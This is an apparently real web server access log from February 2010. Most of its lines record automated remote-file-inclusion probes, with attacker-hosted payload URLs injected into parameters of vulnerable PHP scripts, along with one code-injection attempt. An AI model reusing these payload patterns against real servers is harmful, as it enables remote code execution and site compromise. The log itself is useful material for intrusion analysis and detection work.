88.249.15.117 - - [18/Feb/2010:09:15:53 -0800] "GET /logs/access_100115.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.242.224.19 - - [18/Feb/2010:09:16:20 -0800] "GET /logs/access_100114.log/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:09:16:33 -0800] "GET /logs/access_100205.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:09:16:33 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:09:16:33 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.128.80.14 - - [18/Feb/2010:09:16:36 -0800] "GET /mambots/content/multithumb/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.128.80.14 - - [18/Feb/2010:09:16:36 -0800] "GET /logs/access_100126.log%20%20//mambots/content/multithumb/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.128.80.14 - - [18/Feb/2010:09:16:36 -0800] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:09:16:53 -0800] "GET /logs//includes/mailaccess/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:09:16:53 -0800] "GET /includes/mailaccess/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:09:16:54 -0800] "GET /logs/access_100122.log%20%20//includes/mailaccess/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.128.80.14 - - [18/Feb/2010:09:18:39 -0800] "GET /logs/access_100201.log%20%20//mambots/content/multithumb/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.249.15.117 - - [18/Feb/2010:09:18:56 -0800] "GET /logs/access_100104.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [18/Feb/2010:09:19:26 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.119.216.146 - - [18/Feb/2010:09:19:26 -0800] "GET /logs/access_100119.log//include/admin.lib.inc.php?site_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.119.216.146 - - [18/Feb/2010:09:19:26 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
64.128.80.14 - - [18/Feb/2010:09:19:50 -0800] "GET /logs/access_100126.log//mambots/content/multithumb/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:09:19:51 -0800] "GET /logs/access_100207.log//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.128.80.14 - - [18/Feb/2010:09:19:55 -0800] "GET /logs/access_100201.log//mambots/content/multithumb/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.248.241.125 - - [18/Feb/2010:09:20:05 -0800] "GET /logs/access_100105.log//modules/My_eGallery/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [18/Feb/2010:09:21:18 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
204.236.250.234 - - [18/Feb/2010:09:21:29 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "Nutch/Nutch-1.0-dev (A Nutch-based crawler.; http://lucene.apache.org/nutch/bot.html; nutch-agent AT lucene.apache.org)" "www.puaga.com"
204.236.250.234 - - [18/Feb/2010:09:21:29 -0800] "GET / HTTP/1.0" 200 3626 "-" "Nutch/Nutch-1.0-dev (A Nutch-based crawler.; http://lucene.apache.org/nutch/bot.html; nutch-agent AT lucene.apache.org)" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:22:35 -0800] "GET /logs/derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:22:35 -0800] "GET /derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:22:35 -0800] "GET /logs/access_100109.log%20%20/derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:22:40 -0800] "GET /logs/access_100109.log%20%20/derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:22:40 -0800] "GET /derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:22:41 -0800] "GET /logs/derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:22:51 -0800] "GET /logs/access_100109.log%20%20/derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:22:51 -0800] "GET /logs/derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:22:52 -0800] "GET /derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.38.54.54 - - [18/Feb/2010:09:22:59 -0800] "GET /logs/access_100103.log//include/print_category.php?setup[use_category]=1&dir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.38.54.54 - - [18/Feb/2010:09:22:59 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.38.54.54 - - [18/Feb/2010:09:22:59 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:23:13 -0800] "GET /logs/access_100109.log/derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:23:13 -0800] "GET /derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:23:13 -0800] "GET /logs/derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.38.54.54 - - [18/Feb/2010:09:23:24 -0800] "GET /logs/access_100201.log//include/print_category.php?setup[use_category]=1&dir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:09:23:41 -0800] "GET /logs/access_100122.log//includes/mailaccess/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:23:50 -0800] "GET /derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:24:08 -0800] "GET /logs/derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:24:08 -0800] "GET /derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:24:08 -0800] "GET /logs/access_100109.log/derniers_commentaires.php?rep=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:09:24:23 -0800] "GET /logs/access_100203.log//includes/mailaccess/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:24:34 -0800] "GET /logs/access_100103.log%20%20/include/livre_include.php?no_connect=lol&chem_absolu=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:24:34 -0800] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:24:34 -0800] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:25:32 -0800] "GET /logs/access_100201.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:25:32 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:25:32 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.249.15.117 - - [18/Feb/2010:09:25:34 -0800] "GET /logs/access_100115.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:43 -0800] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:43 -0800] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:43 -0800] "GET /logs/access_100103.log%20%20/include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:43 -0800] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:43 -0800] "GET /logs/access_100103.log%20%20/include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:43 -0800] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:44 -0800] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:44 -0800] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:44 -0800] "GET /logs/access_100103.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:49 -0800] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:49 -0800] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:49 -0800] "GET /logs/access_100103.log%20%20/include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:50 -0800] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:50 -0800] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:50 -0800] "GET /logs/access_100103.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:51 -0800] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:51 -0800] "GET /logs/access_100103.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:09:25:51 -0800] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:26:12 -0800] "GET /logs/access_100117.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:26:18 -0800] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:26:18 -0800] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:26:18 -0800] "GET /logs/access_100201.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:09:26:35 -0800] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:09:26:35 -0800] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:09:26:35 -0800] "GET /logs/access_100121.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:09:27:45 -0800] "GET /logs/access_100118.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.249.15.117 - - [18/Feb/2010:09:28:01 -0800] "GET /logs/access_100126.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [18/Feb/2010:09:28:05 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [18/Feb/2010:09:28:05 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [18/Feb/2010:09:28:05 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [18/Feb/2010:09:28:48 -0800] "GET /logs/access_100127.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:09:28:51 -0800] "GET /logs/access_100118.log%20%20/port.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:09:28:51 -0800] "GET /port.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:09:28:51 -0800] "GET /logs/port.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:28:54 -0800] "GET /logs/access_100109.log/index.php?from_market=Y&pageurl=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:28:54 -0800] "GET /logs/index.php?from_market=Y&pageurl=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:28:54 -0800] "GET /index.php?from_market=Y&pageurl=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:29:09 -0800] "GET /index.php?from_market=Y&pageurl=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:29:09 -0800] "GET /logs/access_100109.log/index.php?from_market=Y&pageurl=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:29:09 -0800] "GET /logs/index.php?from_market=Y&pageurl=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:09:29:12 -0800] "GET /logs/access_100112.log%20%20/port.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:29:22 -0800] "GET /logs/access_100109.log%20%20/index.php?from_market=Y&pageurl=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:29:22 -0800] "GET /logs/index.php?from_market=Y&pageurl=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:29:23 -0800] "GET /index.php?from_market=Y&pageurl=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:09:29:40 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:09:29:40 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:09:29:40 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:09:29:49 -0800] "GET /bbs/write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:09:29:49 -0800] "GET /logs/access_100118.log/port.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:30:02 -0800] "GET /logs/index.php?from_market=Y&pageurl=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:30:02 -0800] "GET /logs/access_100109.log%20%20/index.php?from_market=Y&pageurl=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:09:30:03 -0800] "GET /index.php?from_market=Y&pageurl=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:30:18 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:30:18 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:30:18 -0800] "GET /logs/access_100201.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:09:31:23 -0800] "GET /logs/access_100120.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:09:31:28 -0800] "GET /logs/view_bbs.php?dir=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:09:31:28 -0800] "GET /logs/access_100109.log%20%20/view_bbs.php?dir=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:09:31:28 -0800] "GET /view_bbs.php?dir=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:09:32:40 -0800] "GET /logs/access_100202.log%20%20/view_bbs.php?dir=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:33:44 -0800] "GET /logs/access_100117.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:34:02 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:34:02 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:34:02 -0800] "GET /logs/access_100201.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [18/Feb/2010:09:34:02 -0800] "GET /logs/access_100123.log//include/admin.lib.inc.php?site_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:34:05 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
